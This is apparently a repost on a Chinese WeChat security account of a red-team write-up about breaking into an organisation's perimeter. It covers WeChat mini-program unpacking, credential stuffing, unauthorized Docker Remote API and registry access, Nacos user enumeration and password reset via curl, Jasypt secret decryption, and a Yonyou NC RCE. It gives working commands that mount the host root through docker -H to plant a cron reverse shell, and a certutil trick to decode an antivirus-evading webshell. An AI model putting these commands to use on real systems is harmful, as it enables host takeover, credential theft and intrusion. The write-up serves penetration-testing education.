|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
1、供应链
1.1、heapdump泄露
通过对供应商资产进行渗透,发现某资产admin目录下存在heapdump文件泄露
1.2、微信小程序接口未授权
1.2.1、微信小程序解包
1.2.1.1、获取wxapkg文件
iOS wxapkg 文件存放路径为:
/var/mobile/Containers/Data/Application/{系统UUID}/Library/WechatPrivate/{user哈希值}/WeApp/LocalCache/release/{小程序的AppID}
/data/data/com.tencent.mm/MicroMsg/{user哈希值}/appbrand/pkg/
C:Users{系统用户名}DocumentsWeChat FilesApplet{小程序的AppID}
1.2.1.2、解密操作
https://github.com/superdashu/pc_wxapkg_decrypt_python
https://github.com/BlackTrace/pc_wxapkg_decrypt
成功解密
1.2.1.3、解包操作
-
https://sqlsec.lanzoub.com/i1NEP0mx694f
node wuWxapkg.js 1.wxapkg
1.3、web程序越权
通过上述收集到的密码,撞密码撞出一个账号,但是此账号为最低权限,无任何操作权限,点击搜索组织架构,此时无任何返回信息
1.4、公众号
js泄露密码,密码可撞库目标单位公众号
2、云原生安全
2.1、Harbor 镜像仓库
可以直接拉取下载镜像文件,可以利用脚本批量下载
2.2、疑似后门
通过配置文件连接数据库等
2.3、docker未授权
2.3.1、 registry api未授权访问
访问/v2/_catalog接口即可查看全部仓库内容
https://github.com/Soufaker/docker_v2_catalog
利用上述工具可直接下载镜像
2.3.2、 Docker Remote API未授权访问
docker -H tcp://<target>:2375 ps -a
#挂载宿主机的根目录到容器内的mnt目录
docker -H tcp://<target>:2375 run -it -v /:/mnt nginx:latest /bin/bash
#反弹shell
echo '反弹shell命令' /mnt/var/spool/cron/crontabs/root
2.4、Nacos
作为一个开源工具,漏洞还是被披露不少的,
未授权访问:
/nacos/v1/auth/users?pageNo=1&pageSize=1 直接查看用户
POST /nacos/v1/auth/users username= & password=
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1&newPassword=test2'
通过编排密码爆破进后台,发现大量配置文件,但敏感信息均被加密
2.4.1、Jasypt加密
加密的内容需要用 ENC(..) 括起来,加密用的密码通过 jasypt.encryptor.password 指定。
spring:
datasource:
username: your-username
password: ENC(encrypted-password)
# application.yml
jasypt:
encryption:
password: 密码
algorithm: 加密方式
import org.jasypt.util.text.BasicTextEncryptor;
public class DecryptionExample {
public static void main(String[] args) {
String encryptionKey = "yourEncryptionKey"; // 加密密钥
BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
textEncryptor.setPassword(encryptionKey);
String encryptedText = "encryptedText"; // 加密后的数据
String decryptedText = textEncryptor.decrypt(encryptedText);
System.out.println("Decrypted Text: " + decryptedText);
}
}
但是客户端加密的安全性主要依赖于客户端代码的保护和可信任性,当密码泄露后,加密也就自然失效了,在ncaos一个文件中发现jasypt加密密码,可以直接进行解密操作
成功连接OSS
成功连接数据库
小程序token,接管小程序
达梦数据库是国产化的关系型数据库,使用下面工具可以进行连接
https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3
3、Nday
3.1、yongyouNC jsInvoke rce漏洞
命令执行成功,但是目标系统存在杀软,无法直接上传文件
3.1.1、certutil
certutil 是 Windows 操作系统中的一个命令行工具,主要用于处理证书和加密相关的操作,利用 certutil的解密操作可以绕过杀软。
echo bash64编码后的免杀马 > myfile.jsp
certutil -decode 木马相对路径 解码后的木马相对路径
3.2、若依二开
shiro的洞修复了,找到一个前台信息泄露漏洞
3.3、shiro
目标路径在被访问时,会先跳转到统一认证登录,导致大部分都忽视了该路径是存在shiro反序列化漏洞的
文章来源:奇安信攻防社区(苏苏的五彩棒)
原文地址:https://forum.butian.net/share/2442
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
推 荐 阅 读
原文始发于微信公众号(潇湘信安):[攻防实战] - 外网突破
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论